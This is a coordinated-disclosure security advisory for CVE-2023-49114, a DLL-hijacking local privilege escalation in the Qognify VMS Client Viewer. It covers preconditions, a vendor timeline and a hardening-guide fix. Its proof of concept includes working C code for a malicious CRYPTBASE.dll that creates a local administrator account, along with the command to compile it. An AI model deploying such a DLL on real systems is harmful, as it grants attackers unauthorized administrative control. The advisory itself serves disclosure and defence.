Local Privilege Escalation via DLL Hijacking in Qognify VMS Client Viewer

Title

Local Privilege Escalation via DLL Hijacking

Product

Qognify VMS Client Viewer

Vulnerable Version

>=7.1

Fixed Version

see solution

CVE Number

CVE-2023-49114

Impact

medium

Homepage

https://www.qognify.com/

Found

23.11.2023

By

Sandro Einfeldt (SEC Consult Vulnerability Lab)

The Qognify VMS Client/Viewer application (VMS_Client.exe) is vulnerable to DLL Hijacking. The application tries to load multiple DLL files from the DLL search order without success. At least one of the missing DLL files can be hijacked. This might allow malicious actors with low privileges on a Windows system to escalate privileges, if some specific pre-conditions are met.

Vendor description

"Qognify, part of Hexagon, helps customers minimize the impact of security, safety and operational incidents. Qognify’s comprehensive portfolio of video management software and enterprise incident management solutions serve thousands of  customers around the world in manufacturing, transportation, retail, education, finance, logistics, corrections, critical infrastructure and government."

Source: https://www.qognify.com/about-us/


Business recommendation

The vendor provides a hardening guide for their customers which should be implemented to ensure that no DLLs can be preloaded.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.


Vulnerability overview/description

1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)

The Qognify VMS Client/Viewer application (VMS_Client.exe) is vulnerable to DLL Hijacking. The application tries to load multiple DLL files from the DLL search order without success. At least one of the missing DLL files can be hijacked. This might allow malicious actors with low privileges on a Windows system to escalate privileges if some specific pre-conditions are met:

  1. The attacker can drop a DLL file in a folder within the DLL search order (This circumstance is based on a configuration issue in the Windows file system permissions and is beyond the attacker's control.).
  2. A high privileged user starts the VMS_Client.exe FAT client application.


Proof of concept

1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)

For successful exploitation, the attacker needs write-access to one of the following directories in the DLL search order:

  1. The directory from which the application loaded
  2. The system directory
  3. The 16-bit system directory
  4. The Windows directory
  5. The current working directory (CWD)
  6. The directories that are listed in the PATH environment variable

The attacker can use the following malicious C-code to create a POC exploit:


#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    if (dwReason == DLL_PROCESS_ATTACH){
        system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");
        system("cmd.exe /C net localgroup administrators secconsult /add");
        ExitProcess(0);
    }
    return TRUE;
}

The following command can be used to compile the code and create the DLL file:

x86_64-w64-mingw32-gcc CRYPTBASE.c -shared -o CRYPTBASE.dll

Next, the CRYPTBASE.dll file has to be dropped into one of the previously mentioned folders of the DLL search order. If a user with local administrative permissions starts the VMS Client/Viewer FAT client application, CRYPTBASE.dll gets loaded and the malicious code gets executed with high privileges. In this POC, the user 'secconsult' is created and added to the group of local administrators. By following this approach, the attacker is able to escalate privileges.

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test:

  • 7.2

According to the vendor, all versions starting from 7.1 are affected. Users should implement the hardening guide.


Vendor contact timeline

2024-01-17 Contacting vendor through supportCY@qognify.com
2024-01-17 Very quick vendor support response, asking for general information about the vulnerability, to be able to assign the correct internal team.
2024-01-17 Sending vendor short overview about the vulnerability.
2024-01-17 Vendor support forwards the information internally, we can submit the advisory unencrypted to the support email address.
2024-01-17 Submitting advisory.
2024-01-17 Vendor support acknowledges receipt of advisory.
2024-01-22 Responsible person at vendor contacts us, scheduling a meeting.
2024-01-22 Vendor support follows up if responsible person contacted us, closes support ticket.
2024-01-23 Meeting with vendor.
2024-02-09 Vendor response with detailed information regarding updated hardening guide.
2024-02-13 Follow-up questions regarding hardening guide & availability, affected version number, sending new advisory draft.
2024-02-21 Vendo sends link to PartnerWeb portal regarding guideline, confirms affected versions (>=7.1).
2024-02-22 Updating security advisory with new information, scheduling release for 26th February.
2024-02-26 Coordinated release of advisory.

Solution

The vendor provides a hardening guide for their customers which should be implemented to ensure that no DLLs can be preloaded.

It can be found in the PartnerWeb portal of Qognify linked from here:


Workaround

Implement the hardening guide.

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Sandro Einfeldt / @2024

 

Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back